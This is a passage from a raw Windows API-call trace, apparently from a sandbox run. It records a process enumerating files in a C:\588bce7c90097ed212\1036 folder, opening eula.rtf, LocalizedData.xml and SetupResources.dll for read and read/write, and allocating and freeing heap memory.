dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.842] AreFileApisANSI () returned 1 [0060.842] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1036\\eula.rtf", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1036\\eula.rtf", lpUsedDefaultChar=0x0) returned 36 [0060.843] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0060.843] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.843] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.843] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0060.843] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0060.843] AreFileApisANSI () returned 1 [0060.843] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0060.843] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68f40 [0060.843] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1036\\eula.rtf") returned 36 [0060.843] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1036\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0060.843] GetFileType (hFile=0x41c) returned 0x1 [0060.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0060.843] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0060.843] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0060.844] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0060.844] CloseHandle (hObject=0x41c) returned 1 [0060.844] AreFileApisANSI () returned 1 [0060.844] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0060.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69170 [0060.844] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x69170, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1036\\eula.rtf") returned 36 [0060.844] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1036\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0060.844] GetFileType (hFile=0x41c) returned 0x1 [0060.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0060.844] CloseHandle (hObject=0x41c) returned 1 [0060.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0060.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0060.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0060.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0060.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0060.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0060.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0060.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0060.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0060.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0060.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0060.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0060.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0060.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0060.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0060.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0060.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0060.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0060.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0060.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0060.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0060.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0060.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0060.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0060.845] AreFileApisANSI () returned 1 [0060.845] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0060.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x690d0 [0060.845] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x690d0, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1036\\eula.rtf") returned 36 [0060.845] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1036\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1036\\eula.rtf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xdc6)) returned 1 [0060.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0060.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0060.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0060.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0060.846] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.846] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.846] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x14412, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0060.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0060.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0060.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0060.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dd90 [0060.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0060.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0060.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0060.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dd90 | out: hHeap=0x20000) returned 1 [0060.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0060.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0060.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0060.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0060.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0060.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0060.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0060.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0060.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0060.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0060.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0060.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0060.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0060.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0060.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0060.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0060.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0060.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0060.846] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.846] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.846] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.846] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0060.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0060.847] AreFileApisANSI () returned 1 [0060.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml", lpUsedDefaultChar=0x0) returned 45 [0060.847] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0060.847] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.847] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.847] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0060.847] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0060.847] AreFileApisANSI () returned 1 [0060.847] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0060.847] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71688 [0060.847] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x71688, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml") returned 45 [0060.847] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1036\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0060.847] GetFileType (hFile=0x41c) returned 0x1 [0060.847] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0060.847] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0060.848] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0060.848] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0060.848] CloseHandle (hObject=0x41c) returned 1 [0060.848] AreFileApisANSI () returned 1 [0060.848] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0060.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71960 [0060.848] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml") returned 45 [0060.848] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1036\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0060.848] GetFileType (hFile=0x41c) returned 0x1 [0060.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0060.848] CloseHandle (hObject=0x41c) returned 1 [0060.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0060.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0060.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0060.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0060.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0060.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0060.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0060.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dd90 [0060.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0060.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dd90 | out: hHeap=0x20000) returned 1 [0060.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0060.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0060.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0060.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0060.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0060.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0060.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0060.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0060.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0060.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0060.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0060.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0060.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0060.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0060.849] AreFileApisANSI () returned 1 [0060.849] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0060.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71960 [0060.849] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml") returned 45 [0060.849] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1036\\localizeddata.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x14412)) returned 1 [0060.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0060.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0060.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0060.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0060.850] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.850] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.850] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0060.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0060.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0060.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0060.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0060.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0060.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0060.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0060.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0060.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0060.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0060.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0060.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0060.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0060.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0060.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0060.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0060.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0060.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0060.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0060.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0060.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0060.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0060.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0060.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0060.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0060.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0060.850] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.850] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.850] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.850] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0060.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0060.851] AreFileApisANSI () returned 1 [0060.851] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1036\\SetupResources.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1036\\SetupResources.dll", lpUsedDefaultChar=0x0) returned 46 [0060.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dd90 [0060.851] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, 